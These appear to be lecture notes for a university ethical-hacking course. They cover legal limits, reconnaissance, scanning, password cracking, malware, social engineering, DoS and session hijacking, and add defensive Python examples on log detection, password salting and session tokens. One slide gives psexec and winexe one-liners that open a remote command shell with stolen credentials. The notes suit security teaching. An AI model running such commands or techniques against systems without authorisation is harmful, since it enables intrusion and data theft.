CYS3104 Chapter 1: Ethical Hacking Overview
By Kushantha Gunawardana

OBJECTIVES
- Describe the role of an ethical hacker
- Describe what you can do legally as an ethical hacker
- Describe what you cannot do as an ethical hacker
- Classification of hackers
- Hacking terminology
Ethical Hacking By Kushantha Gunawardana 2

INTRODUCTION TO ETHICAL HACKING
- Ethical hackers: employed by companies to perform penetration tests
- Penetration test: a legal attempt to break into a company's network to find its weakest link; the tester only reports findings and does not solve problems
- Security test: more than an attempt to break in; it also includes analyzing the company's security policy and procedures, and the tester offers solutions to secure or protect the network

THE ROLE OF SECURITY AND PENETRATION TESTERS
- Hackers: access a computer system or network without authorization; this breaks the law, and they can go to prison
- Crackers: break into systems to steal or destroy data
- The U.S. Department of Justice calls both "hackers"
- Ethical hacker: performs most of the same activities, but with the owner's permission
- Script kiddies or packet monkeys: young, inexperienced hackers who copy code and techniques from knowledgeable hackers
- Experienced penetration testers write programs or scripts using languages such as Practical Extraction and Report Language (Perl), C, C++, Python, JavaScript, Visual Basic, SQL, and many others
- Script: a set of instructions that runs in sequence

IT TAKES TIME TO BECOME A HACKER
- This class alone won't make you a hacker, or an expert; it might make you a script kiddie
- It usually takes years of study and experience to earn respect in the hacker community
- It's a hobby, a lifestyle, and an attitude: a drive to figure out how things work

THE ROLE OF SECURITY AND PENETRATION TESTERS (continued)
- Tiger box: a collection of OSs and hacking tools, usually on a laptop
- Helps penetration testers and security testers conduct vulnerability assessments and attacks
- Examples of tiger boxes: Kali Linux, Parrot Security, Security Onion, Predator

PENETRATION-TESTING METHODOLOGIES
- White box model: the tester is told everything about the network topology and technology (network diagram) and is authorized to interview IT personnel and company employees; this makes the tester's job a little easier
- Black box model: company staff does not know about the test, and the tester is not given details about the network, so the burden is on the tester to find these details; this tests whether security personnel are able to detect an attack
- Gray box model: a hybrid of the white and black box models; the company gives the tester partial information

CERTIFICATION PROGRAMS FOR NETWORK SECURITY PERSONNEL
- Certification programs are available in almost every area of network security
- Basics: CompTIA Security+ (CNIT 120), Network+ (CNIT 106 or 201), Cisco Network Security
- Issued by the International Information Systems Security Certifications Consortium (ISC2): usually more concerned with policies and procedures than technical details; Web site www.isc2.org

SANS INSTITUTE
- SysAdmin, Audit, Network, Security (SANS)
- Offers certifications through Global Information Assurance Certification (GIAC)
- Top 20 list: one of the most popular SANS Institute documents; details the most common network exploits and suggests ways of correcting vulnerabilities
- Web site www.sans.org (links Ch 1i & Ch 1j)

WHAT YOU CAN DO LEGALLY
- Laws involving technology change as rapidly as technology itself
- Find out what is legal for you locally; laws change from place to place
- Be aware of what is allowed and what is not allowed

LAWS OF THE LAND
- Tools on your computer might be illegal to possess; contact local law enforcement agencies before installing hacking tools
- Written words are open to interpretation
- Governments are getting more serious about punishment for cybercrimes

IS PORT SCANNING LEGAL?
- Some states deem it legal; this is not always the case
- The Federal Government does not see it as a violation and allows each state to address it separately
- Read your ISP's "Acceptable Use Policy"
- IRC "bots" may be forbidden: a program that sends automatic responses to users, giving the appearance of a person being present

FEDERAL LAWS
- Federal computer crime laws are getting more specific; they cover cybercrimes and intellectual property issues
- Computer Hacking and Intellectual Property (CHIP): a new government branch to address cybercrimes and intellectual property issues

WHAT YOU CANNOT DO LEGALLY
- Accessing a computer without permission is illegal
- Other illegal actions: installing worms or viruses; Denial of Service attacks; denying users access to network resources
- Be careful that your actions do not prevent customers from doing their jobs

GET IT IN WRITING
- Using a contract is just good business; contracts may be useful in court
- Books on working as an independent contractor: The Computer Consultant's Guide by Janet Ruhl; Getting Started in Computer Consulting by Peter Meyer
- The Internet can also be a useful resource
- Have an attorney read over your contract before sending or signing it
ETHICAL HACKING IN A NUTSHELL
- What it takes to be a security tester: knowledge of network and computer technology; the ability to communicate with management and IT personnel; an understanding of the laws; the ability to use the necessary tools

CYS3104 Chapter 2: Ethical Hacking Overview
By Kushantha Gunawardana

Topics: hackers and their vocabulary; threats and risks; types of hackers; gaining access; intrusion detection and prevention; legal and ethical issues

Hackers and their vocabulary
- Hacking: showing computer expertise
- Cracking: breaching security on software or systems
- Phreaking: cracking telecom networks
- Spoofing: faking the originating IP address in a datagram
- Denial of Service (DoS): flooding a host with sufficient network traffic so that it can't respond anymore
- Port scanning: searching for vulnerabilities

Milestones
- 1969: Unix 'hacked' together
- 1971: Cap 'n Crunch phone exploit discovered
- 1988: Morris Internet worm crashes 6,000 servers
- 1994: $10 million transferred from CitiBank accounts
- 1995: Kevin Mitnick sentenced to 5 years in jail
- 2000: Major websites succumb to DDoS
- 2000: 15,700 credit and debit card numbers stolen from Western Union (hacked while the web database was undergoing maintenance)
- 2001: Code Red exploited a bug in MS IIS to penetrate and spread; it probed random IPs for systems running IIS and had a trigger time for a denial-of-service attack; the 2nd wave infected 360,000 servers in 14 hours. Code Red 2 had a backdoor installed to allow remote control. Nimda used multiple infection mechanisms: email, shares, web client, IIS
- 2002: Slammer worm brings the web to its knees by attacking MS SQL Server

Threats and risks
- Denial of Service (Yahoo, eBay, CNN, MS)
- Defacing, graffiti, slander, reputation
- Loss of data (destruction, theft)
- Divulging private information (AirMiles, corporate espionage, personal financial)
- Loss of financial assets (CitiBank)

Types of hackers
- Professional hackers: Black Hats (the bad guys); White Hats (professional security experts)
- Script kiddies: mostly kids/students; use tools created by black hats; want to get free stuff, impress their peers, and not get caught
- Underemployed adult hackers: former script kiddies; can't get employment in the field; want recognition in the hacker community; big in Eastern European countries
- Ideological hackers: hack as a mechanism to promote some political or ideological purpose; usually coincides with political events
- Criminal hackers: real criminals, in it for whatever they can get no matter who it hurts
- Corporate spies: relatively rare
- Disgruntled employees: most dangerous to an enterprise as they are "insiders"; since many companies subcontract their network services, a disgruntled vendor could be very dangerous to the host enterprise

Gaining access
- Front door: password guessing; password/key stealing
- Back doors: often left by the original developers as debug and/or diagnostic tools and forgotten before release
- Trojan horses: usually hidden inside software that we download and install from the net (remember, nothing is free); many install backdoors
- Software vulnerability exploitation: often advertised on the OEM's web site along with the security patches; fertile ground for script kiddies looking for something to do
- Whack-a-mole / NetBus: cable modems / DSL are very vulnerable; protect with virus scanners, port scanners, personal firewalls; AndroRAT, Nuclear RAT
- Buffer overflows
- SQL injection / XSS / injection attacks: HTML / CGI scripts; poor design of web applications; JavaScript hacks; PHP/ASP/ColdFusion URL hacks
- Other holes / bugs in software and services: tools and scripts are used to scan ports for vulnerabilities
- Weak passwords: default or null passwords; password same as the user name (use finger); password files, trusted servers; brute force (make sure login attempts are audited!)
- Dumpster diving: it's amazing what people throw in the trash (personal information, passwords, good doughnuts); many enterprises now shred all white paper trash
- Inside jobs: disgruntled employees; terminated employees (about 50% of intrusions resulting in significant loss)

After gaining access
- Modify logs: to cover their tracks; to mess with you
- Steal files: sometimes destroyed after stealing; a pro would steal and cover their tracks so as to remain undetected
- Modify files: to let you know they were there; to cause mischief
- Install back doors: so they can get in again
- Attack other systems

Intrusion detection and prevention
- A lot of research is going on at universities: Doug Somerville (EE Dept), Viktor Skorman (EE Dept); big money is available due to 9/11 and the Dept of Homeland Security
- Vulnerability scanners: pro-actively identify risks
- Use pattern matching on user behaviour: when a pattern deviates from the norm, it should be investigated
- Network-based IDS: examines packets for suspicious activity; can integrate with a firewall; requires one dedicated IDS server per segment
- Host-based IDS: monitors logs, events, files, and packets sent to the host; installed on each host on the network
- Honeypot: a decoy server that collects evidence and alerts the admin
- Prevention: patches and upgrades (hardening); disabling unnecessary software; firewalls and intrusion detection systems; 'honeypots'; recognizing and reacting to port scanning

Legal and ethical issues
- 'Ethical' hacking?
- How to react to mischief or nuisances?
- Is scanning for vulnerabilities legal? Some hackers are trying to use this as a business model: "Here are your vulnerabilities, let us help you"
- Can private property laws be applied on the Internet?
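The pattern-matching idea above (an IDS flags activity that deviates from the norm, login attempts are audited, port scans are recognized) as a small worked example; this is added code, not material from the lecture slides, and the log format, thresholds and addresses are constructed for the demo.

```python
"""Added example (not from the lecture slides): a small log-based detector that
applies the "pattern deviates from the norm" idea.  It flags (1) one source
touching many distinct ports on one host in a short window, i.e. a port scan,
and (2) a burst of failed logins from one source, i.e. a brute-force attempt.
The log format, thresholds and addresses are constructed for this demo."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not captured from a real system).  Two event kinds:
#   <ISO time> conn src=<ip> dst=<ip> dport=<port>
#   <ISO time> auth_fail src=<ip> user=<name>
SAMPLE_LOG = """\
2024-05-01T10:00:00 conn src=10.0.0.5 dst=10.0.0.20 dport=21
2024-05-01T10:00:01 conn src=10.0.0.5 dst=10.0.0.20 dport=22
2024-05-01T10:00:02 conn src=10.0.0.5 dst=10.0.0.20 dport=23
2024-05-01T10:00:03 conn src=10.0.0.5 dst=10.0.0.20 dport=25
2024-05-01T10:00:04 conn src=10.0.0.5 dst=10.0.0.20 dport=80
2024-05-01T10:00:05 conn src=10.0.0.5 dst=10.0.0.20 dport=110
2024-05-01T10:00:06 conn src=10.0.0.5 dst=10.0.0.20 dport=139
2024-05-01T10:00:07 conn src=10.0.0.5 dst=10.0.0.20 dport=443
2024-05-01T10:00:08 conn src=10.0.0.5 dst=10.0.0.20 dport=445
2024-05-01T10:00:00 conn src=10.0.0.7 dst=10.0.0.20 dport=80
2024-05-01T10:00:03 conn src=10.0.0.7 dst=10.0.0.20 dport=443
2024-05-01T10:00:09 conn src=10.0.0.7 dst=10.0.0.20 dport=80
2024-05-01T10:01:00 auth_fail src=10.0.0.5 user=administrator
2024-05-01T10:01:05 auth_fail src=10.0.0.5 user=administrator
2024-05-01T10:01:10 auth_fail src=10.0.0.5 user=admin
2024-05-01T10:01:15 auth_fail src=10.0.0.5 user=root
2024-05-01T10:01:20 auth_fail src=10.0.0.5 user=guest
2024-05-01T10:01:25 auth_fail src=10.0.0.5 user=administrator
2024-05-01T10:01:30 auth_fail src=10.0.0.9 user=alice
2024-05-01T10:01:40 auth_fail src=10.0.0.9 user=alice
"""


def parse_log(text):
    """Turn the raw log into a list of dicts: ts, event, plus the key=value fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event, *fields = line.split()
        rec = {"ts": datetime.fromisoformat(ts), "event": event}
        rec.update(f.split("=", 1) for f in fields)
        records.append(rec)
    return records


def peak_distinct(events, window):
    """Sliding window over (timestamp, value) pairs: the largest number of
    distinct values seen inside any span of length `window`."""
    events = sorted(events)
    peak, start = 0, 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window:
            start += 1
        peak = max(peak, len({v for _, v in events[start:end + 1]}))
    return peak


def detect_port_scans(records, window=timedelta(seconds=10), min_ports=8):
    """{(src, dst): ports} for pairs where one source touched at least
    min_ports distinct destination ports on one host inside `window`."""
    per_pair = defaultdict(list)
    for r in records:
        if r["event"] == "conn":
            per_pair[(r["src"], r["dst"])].append((r["ts"], int(r["dport"])))
    alerts = {}
    for pair, evs in per_pair.items():
        peak = peak_distinct(evs, window)
        if peak >= min_ports:
            alerts[pair] = peak
    return alerts


def detect_bruteforce(records, window=timedelta(seconds=60), max_fail=5):
    """{src: failures} for sources with more than max_fail auth_fail events
    inside `window` (the slide's "make sure login attempts are audited")."""
    per_src = defaultdict(list)
    for r in records:
        if r["event"] == "auth_fail":
            # index as the value so every failure counts as distinct
            per_src[r["src"]].append((r["ts"], len(per_src[r["src"]])))
    alerts = {}
    for src, evs in per_src.items():
        peak = peak_distinct(evs, window)
        if peak > max_fail:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("port scans:", detect_port_scans(recs))
    print("brute force:", detect_bruteforce(recs))
```

The benign client 10.0.0.7 (two ports, normal web traffic) and the two failed logins from 10.0.0.9 stay below the thresholds, which is the "norm" the detector is measuring deviation from.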
Types of computer crime
- Financial fraud: credit card theft; identity theft
- Computer-specific crimes: denial-of-service; denial of access to information; viruses (the Melissa virus cost a New Jersey man 20 months in jail; Melissa caused in excess of $80 million in damage)
- Intellectual property offenses: information theft; trafficking in pirated information; storing pirated information; compromising information; destroying information
- Content-related offenses: hate crimes; harassment; cyber-stalking; child privacy

U.S. legislation
- Computer Fraud and Abuse Act of 1984: makes it a crime to knowingly access a federal computer
- Electronic Communications Privacy Act of 1986: updated the Federal Wiretap Act to include electronically stored data
- U.S. Communications Assistance for Law Enforcement Act of 1996: amended the Electronic Communications Act to require all communications carriers to make wiretaps possible
- Economic and Protection of Proprietary Information Act of 1996: extends the definition of privacy to include proprietary economic information; theft would constitute corporate or industrial espionage
- Health Insurance Portability and Accountability Act of 1996: standards for the electronic transmission of healthcare information
- National Information Infrastructure Protection Act of 1996: amends the Computer Fraud and Abuse Act to provide more protection to computerized information and systems used in foreign and interstate commerce or communications
- The Gramm-Leach-Bliley Act of 1999: limits the instances in which a financial institution can disclose nonpublic information of a customer to a third party

Risk versus reward
- The average armed robber will get $2500-$7500 and risks being shot or killed; 50-60% will get caught, convicted and spend an average of 5 years of hard time
- The average computer criminal will net $50K-$500K with a risk of being fired or going to jail; only 10% are caught, of those only 15% will be turned in to the authorities, and less than 50% of them will do jail time

Prosecution
- Many institutions fail to prosecute for fear of the publicity
- Many banks absorb the losses, fearing that they would lose more if their customers found out and took their business elsewhere
- Fix the vulnerability and continue with business as usual

CYS3104 Chapter 3: Phases of Ethical Hacking
By Kushantha Gunawardana

Five phases of hacking (outline)
- Reconnaissance: open-source intelligence
- Scanning: port scanning; ping sweep; vulnerability scanning
- Enumeration
- System hacking
- Network hacking
- Software hacking

The five phases: Reconnaissance; Scanning; Gaining Access; Maintaining Access; Covering Tracks

Reconnaissance
- Collect the maximum information about the network, hosts, ports, services and other target system information. This can be done by directly approaching the target and gaining knowledge about it, or by using indirect methods such as web sites and social sites.
- Techniques: open-source intelligence; Whois; social engineering; Shodan; ping; traceroute
- Open-source intelligence is a method of collecting and analyzing data from publicly available sources. Tools: Maltego, Spyse, Intelligence X, Recon-ng, theHarvester
- Shodan is a search engine for internet-connected devices such as routers, servers, IoT devices, etc.
- theHarvester is a tool designed to grab information such as emails, subdomains, employee names, banners, etc.
- A Whois lookup is used to find information related to a specific domain, such as the owner's name, address, contact details, etc.

Scanning
- The scanning phase is for bulk assessment and identification of listening ports and services. Vulnerability scanning is also part of this process.
- Techniques: port scanning; ping sweep; OS detection
- Port scanning: a method for determining which ports are open on a target. Ports are where information is sent and received; scanning them is similar to knocking on doors to check whether someone is there. Tools: Nmap, Netcat, Legion, Advanced Port Scanner
- Ping sweep: a technique used to determine which IPs are alive in a network or a particular IP range. Tools: Angry IP Scanner, Fping, Advanced IP Scanner, Hping, Network Pinger
- Vulnerability scanning: a technique to assess possible security vulnerabilities in a target computer, system, service or network. It helps to map out which exploits should be launched in the next phases. Tools: Nessus Pro, OpenVAS, Rapid7, Burp Suite
- A Nessus vulnerability scan result shows: alive hosts; open ports; running services and their versions; detected OS versions; detected vulnerabilities; the severity level of particular vulnerabilities; solutions

Enumeration
- The process of identifying resources on a network and probing a system more deeply for information. It includes: listing user accounts; listing file shares; retrieving network information; identifying applications
- Types: SMB enumeration; LDAP enumeration; DNS enumeration; SNMP enumeration; SMTP enumeration; RPC enumeration
- SMB enumeration: used to enumerate shared network resources and users through the SMB service. The SMB protocol is used to share files inside the network. Tools: Smbmap, Nmap smb scripts, Smbclient, enum4linux
- LDAP enumeration: Lightweight Directory Access Protocol (LDAP) is a protocol used to access directory services such as Active Directory. Using LDAP enumeration one can retrieve: the domain structure; user names; group names; the domain name; the forest name; domain and forest levels. Tools: Nmap (using the ldap-search script), ldapsearch, ad-ldap-enum, JXplorer

CYS3104 Chapter 4: Scanning and Enumeration
By Kushantha Gunawardana

Five phases of hacking (outline): Reconnaissance (open-source intelligence); Scanning (port scanning, ping sweep, vulnerability scanning); Enumeration

DNS enumeration
- DNS is a naming system that converts human-readable domain names into computer-readable IP addresses. It provides functionality that is essential for the internet to work; therefore the DNS service is very important for accessing a remote server using a domain name. If those records are manipulated or hijacked, an attacker can gain access to unauthorized information.
- Techniques: DNS zone transfer; DNS brute force. Tools: Dnsenum, dnsrecon
- DNS brute-forcing is a method to reveal subdomains of a particular target domain. Using a pre-built wordlist, it checks whether candidate subdomains resolve; if they resolve to IPs, that subdomain actually exists.
- Dnsenum: a multithreaded tool written in Perl, used to enumerate the DNS information of a domain. It is capable of getting A and MX records, performing AXFR queries (retrieving data via zone transfer), getting extra names and subdomains from Google scraping, DNS brute force, and performing reverse lookups on network ranges.
- Dnsrecon: a tool similar to dnsenum but Python-based. It is capable of checking all NS records for zone transfer, retrieving general DNS records, SRV record enumeration, wildcard resolution, enumerating hosts and subdomains using Google, etc.
- Using the above techniques and tools an attacker can uncover IP addresses, hidden domains, subdomains, name servers, mail server details and other important information about a particular company or organization for the further exploitation process.
- Identifying live hosts is a basic step in the attack methodology. If the intended target is unknown, it could take a long time to find the particular live hosts.

CYS3104 Chapter 5: System Hacking
By Kushantha Gunawardana

Password cracking
- Password cracking techniques are used to recover passwords from computer systems. Attackers use password cracking techniques to gain unauthorized access to a vulnerable system. Most password cracking techniques succeed because of weak or easily guessable passwords.
- Non-electronic attacks: shoulder surfing; dumpster diving
- Active online attacks: dictionary attack; brute-forcing attack; rule-based attack
- Passive online attacks: wire sniffing; MITM; replay attacks
- Offline attacks: rainbow table attack; distributed network attack

Security Accounts Manager (SAM)
- Windows stores user passwords in the SAM, or in the Active Directory database in a domain. Passwords are never stored in clear text; passwords are hashed and the results are stored in the SAM.
- NTLM authentication versus Kerberos authentication: Microsoft has upgraded its default authentication protocol to Kerberos, which provides stronger authentication for client/server applications than NTLM.
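An added example, not from the slides, showing why "hashed, never clear text" is only half of the story: an unsalted fast hash beside a salted, slow PBKDF2 scheme, with the precomputed-table lookup that the rainbow table attack listed under offline attacks relies on. The wordlist, user passwords and the `pbkdf2$...` storage format are constructed for the demo.

```python
"""Added example (not from the slides): a fast unsalted hash can be reversed
with a table computed once in advance (the precomputation a rainbow table
optimizes), while a per-user salt plus a deliberately slow derivation defeats
that table.  Wordlist, passwords and storage format are constructed."""
import hashlib
import hmac
import os

# Constructed wordlist standing in for the dictionary an offline attacker
# precomputes against.  Real wordlists have millions of entries.
WORDLIST = ["123456", "password", "Password1", "qwerty", "letmein", "welcome"]


def unsalted_hash(password):
    """Weak scheme: one fast hash over the password, no salt."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute hash -> password once.  Because there is no salt, the same
    table works against every user and every site using this scheme."""
    return {unsalted_hash(w): w for w in words}


def reverse_with_table(table, stored_hash):
    """Offline attack: a dictionary lookup, no hashing at all at attack time."""
    return table.get(stored_hash)


# Hardened scheme: random per-user salt and a slow key derivation function.
PBKDF2_ROUNDS = 100_000


def salted_hash(password, salt=None, rounds=PBKDF2_ROUNDS):
    """Return 'pbkdf2$<rounds>$<salt hex>$<hash hex>' with a fresh 16-byte salt."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2${rounds}${salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and rounds; compare in constant time."""
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo():
    """Two users who chose the same weak password, stored both ways."""
    table = build_lookup_table(WORDLIST)
    weak_alice, weak_bob = unsalted_hash("Password1"), unsalted_hash("Password1")
    strong_alice, strong_bob = salted_hash("Password1"), salted_hash("Password1")
    return {
        # identical hashes leak that two users share a password
        "weak_hashes_identical": weak_alice == weak_bob,
        # and a single table lookup recovers it for both
        "weak_recovered": reverse_with_table(table, weak_alice),
        # salted: different hashes, and the precomputed table finds nothing
        "strong_hashes_identical": strong_alice == strong_bob,
        "strong_recovered": reverse_with_table(table, strong_alice.split("$")[-1]),
        # the legitimate login path still works, and wrong passwords fail
        "strong_verifies": verify_salted("Password1", strong_alice),
        "strong_rejects_wrong": verify_salted("Password2", strong_alice),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The weak password is still weak: the slow hash only raises the attacker's cost per guess per user, which is why the slide's point about guessable passwords stands regardless of the storage scheme.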
Password cracking tools: L0phtCrack, Ophcrack, Cain & Abel, RainbowCrack, CrackMapExec, Aircrack-ng suite, Hydra, Hashcat, Medusa, John the Ripper

Types of privilege escalation
- Vertical privilege escalation: gaining higher privileges than the existing ones
- Horizontal privilege escalation: acquiring the same level of privileges that has already been granted, but assuming the identity of another user with similar privileges
- User -> Admin: passwd vulnerability; weak permissions (service, file); DLL hijacking
- Admin -> Other/System: pass the hash; install service (sc); (access) token kidnapping; process hijacking (RunFromProcess)

Executing applications
- Attackers execute malicious applications in this stage. This is called "owning" the system. Attackers execute malicious programs remotely on the victim's machine to gather information that leads to exploitation or loss of privacy, gain unauthorized access to system resources, crack passwords, capture screenshots, and install a backdoor to maintain easy access.
- Windows: psexec \\IP -u User -p PW cmd.exe
- Linux: winexe -U USER%PW //IP cmd.exe

Keystroke loggers
- Keystroke loggers are programs or hardware devices that monitor each keystroke as a user types on a keyboard, log the keystrokes to a file, or transmit them to a remote location.
- Legitimate applications of keyloggers include office and industrial settings, to monitor employees' computer activities, and home environments, where parents can monitor children's activity.
- They allow attackers to gather confidential information about victims such as email IDs, passwords, banking details, chat room activity, IRC, instant messages, etc.
- Physical keyloggers are placed between the keyboard hardware and the operating system.
- Types: hardware keyloggers; software keyloggers

Spyware
- Spyware is a program that records a user's interaction with the computer and the Internet without the user's knowledge and sends the recordings to remote attackers. Spyware hides its process, files, and other objects in order to avoid detection and removal.
- It is similar to a Trojan horse, which is usually bundled as a hidden component of freeware programs available for download on the Internet.

Rootkits
- Rootkits are programs that hide their presence as well as the attacker's malicious activities, granting the attacker full access to the server or host at that time and in the future. Rootkits replace certain operating system calls and utilities with their own modified versions of those routines, which in turn undermine the security of the target system and cause malicious functions to be executed.
- A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, etc.

Steganography
- Steganography is a technique of hiding a secret message within an ordinary message and extracting it at the destination, to maintain the confidentiality of data. Utilizing a graphic image as the cover is the most popular method of concealing data in files.
- Attackers can use steganography to hide messages such as a list of compromised servers, the source code for a hacking tool, plans for future attacks, etc.

Covering tracks
- Once intruders have successfully gained administrator access on a system, they will try to cover their tracks to avoid detection. An attacker uses the following techniques to cover tracks on the target system: disabling auditing; clearing logs; manipulating logs

CYS3104 Chapter 6: Malware Threats
By Kushantha Gunawardana

- Malware is malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud.
- Examples of malware: Trojan, backdoor, rootkit, ransomware, adware, virus, worms, spyware, botnet, crypter

Trojans
- A Trojan is a program in which malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk. Trojans are activated by certain predefined user actions.
- Indications of a Trojan attack include abnormal system and network activities such as the disabling of antivirus, redirection to unknown pages, etc.
- Trojans create a covert communication channel between the victim computer and the attacker for transferring sensitive data.

Viruses
- A virus is a self-replicating program that produces its own copy by attaching itself to another program, a computer boot sector or a document. Viruses are generally transmitted through file downloads, infected disk/flash drives and as email attachments.
- Virus characteristics: infects other programs; transforms itself; encrypts itself; alters data; corrupts files and programs; self-replication
- Virus life cycle: design; replication; launch; detection; incorporation; elimination
- Types of viruses: system or boot sector viruses; file and multipartite viruses; macro viruses; cluster viruses; stealth/tunneling viruses; encryption viruses; metamorphic viruses; file overwriting or cavity viruses; sparse infector viruses; companion/camouflage viruses; shell viruses; file extension viruses; add-on and intrusive viruses; transient and terminate-and-stay-resident viruses

Worms
- Computer worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system.
- Attackers use worm payloads to install backdoors in infected computers, which turns them into zombies and creates botnets; these botnets can be used to carry out further cyber attacks.

Malware analysis: static malware analysis; dynamic malware analysis

CYS3104 Chapter 7: Sniffing
By Kushantha Gunawardana

- Sniffing is the process of monitoring and capturing all data packets passing through a given network using sniffing tools. It is a form of wiretap applied to computer networks.
- Many enterprises' switch ports are open. Anyone in the same physical location can plug into the network using an Ethernet cable.
CYS3104 Chapter 8: Social Engineering
By Kushantha Gunawardana

- Social engineering is the art of convincing people to reveal confidential information. Common targets of social engineering include help desk personnel, technical support executives, system administrators, etc.
- Social engineers depend on the fact that people are unaware of the value of their information and are careless about protecting it.
- Security policies are only as strong as their weakest link, and humans are the most susceptible factor.
- It is difficult to detect social engineering attempts. There is no method to ensure complete security from social engineering attacks, and no specific software or hardware for defending against a social engineering attack.

Types of social engineering
- Human-based: eavesdropping; shoulder surfing; dumpster diving; reverse social engineering; piggybacking; tailgating
- Computer-based: pop-up windows; hoax letters; chain letters; instant chat messenger; spam email; phishing; spear phishing
- Mobile-based: publishing malicious apps; repackaging legitimate apps; using SMS

Insider threats
- Spying: if a competitor wants to cause damage to your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they will be in the organization.
- Revenge: it takes only one disgruntled person to take revenge and your company is compromised.
- Insider attack: an inside attack is easy to launch; prevention is difficult; the inside attacker can easily succeed.

Identity theft
- Identity theft occurs when someone steals your personally identifiable information for fraudulent purposes. It is a crime in which an imposter obtains personal identifying information such as a name, credit card number, social security or driver's license number, etc. to commit fraud or other crimes.
- Attackers can use identity theft to impersonate employees of a target organization and physically access the facility.

CYS3104 Chapter 9: DoS & DDoS
By Kushantha Gunawardana

- Denial of Service (DoS) is an attack on a computer or network that reduces, restricts or prevents the accessibility of system resources to its legitimate users. In a DoS attack, attackers flood a victim system with non-legitimate service requests or traffic to overload its resources. A DoS attack leads to the unavailability of a particular website and slow network performance.
- A distributed denial-of-service (DDoS) attack involves a multitude of compromised systems attacking a single target, thereby causing denial of service for users of the targeted system. To launch a DDoS attack, an attacker uses botnets and attacks a single system.
- Categories: volumetric attacks; fragmentation attacks; TCP state-exhaustion attacks; application layer attacks
- Techniques: bandwidth attacks and service request floods; SYN flooding attack; ICMP flood attack; peer-to-peer attacks; application-level flood attacks; permanent denial-of-service attack; distributed reflection denial of service (DrDoS); phlashing; sabotage; bricking a system
- Bots are software applications that run automated tasks over the Internet and perform simple repetitive tasks, such as web spidering and search engine indexing. A botnet is a huge network of compromised systems and can be used by an attacker to launch denial-of-service attacks.
- Tools: HULK, Tor's Hammer, Slowloris, LOIC, XOIC, DDOSIM, RUDY, PyLoris

CYS3104 Chapter 10: Session Hijacking
By Kushantha Gunawardana

- Session hijacking refers to an attack in which an attacker takes over a valid TCP communication session between two computers. Since most authentication only occurs at the start of a TCP session, this allows the attacker to gain access to a machine.
- Attackers can sniff all the traffic from established TCP sessions and perform identity theft, information theft, fraud, etc.
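An added example that is not part of the slides: a minimal server-side session store showing a predictable token generator and a session whose ID is not rotated at login (the predictable session token and session fixation weaknesses named in this chapter) beside the hardened versions. Class and function names are illustrative, not any framework's API.

```python
"""Added example (not from the slides): a toy session store that makes two
session hijacking weaknesses concrete next to their fixes.
 1. Predictable session token: a counter-based ID lets anyone who sees one
    token guess the next; a CSPRNG token does not.
 2. Session fixation: if the ID issued before login stays valid after login,
    an ID an attacker planted or observed becomes an authenticated session;
    rotating the ID at login closes that gap.
All names are illustrative."""
import secrets


class PredictableTokens:
    """Bad: sequential IDs.  Seeing one token reveals the next one."""
    def __init__(self, start=1000):
        self.counter = start

    def next(self):
        self.counter += 1
        return str(self.counter)


class RandomTokens:
    """Good: 256 bits from the OS CSPRNG, no relation between successive IDs."""
    def next(self):
        return secrets.token_urlsafe(32)


class SessionStore:
    def __init__(self, token_source, rotate_on_login=True):
        self.tokens = token_source
        self.rotate_on_login = rotate_on_login
        self.sessions = {}   # session_id -> {"user": name or None}

    def start_session(self):
        """Anonymous (pre-authentication) session, e.g. on the first page view."""
        sid = self.tokens.next()
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, user):
        """Authenticate the session.  With rotation, the pre-login ID is
        invalidated and a fresh one is issued to the client."""
        if sid not in self.sessions:
            raise KeyError("unknown session")
        if not self.rotate_on_login:
            self.sessions[sid]["user"] = user      # vulnerable: ID unchanged
            return sid
        del self.sessions[sid]                      # old ID is now worthless
        new_sid = self.tokens.next()
        self.sessions[new_sid] = {"user": user}
        return new_sid

    def whoami(self, sid):
        """User bound to this ID, or None if the ID is unknown or anonymous."""
        return self.sessions.get(sid, {}).get("user")


def fixation_check(store):
    """Model of the fixation scenario: an ID exists before login, the victim
    authenticates while carrying it, and that same pre-login ID is presented
    afterwards.  Returns the user that ID now resolves to (None = safe)."""
    planted = store.start_session()
    store.login(planted, "victim")
    return store.whoami(planted)


def predict_next(observed_token):
    """Guess for a counter-based scheme: previous value plus one."""
    return str(int(observed_token) + 1)


if __name__ == "__main__":
    print("no rotation:", fixation_check(SessionStore(PredictableTokens(), False)))
    print("rotation:   ", fixation_check(SessionStore(RandomTokens(), True)))
```

Rotation at login is the fix for fixation and a CSPRNG token is the fix for prediction; both are needed, since a random ID that is never rotated is still fixable and a rotated ID that is predictable is still guessable.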
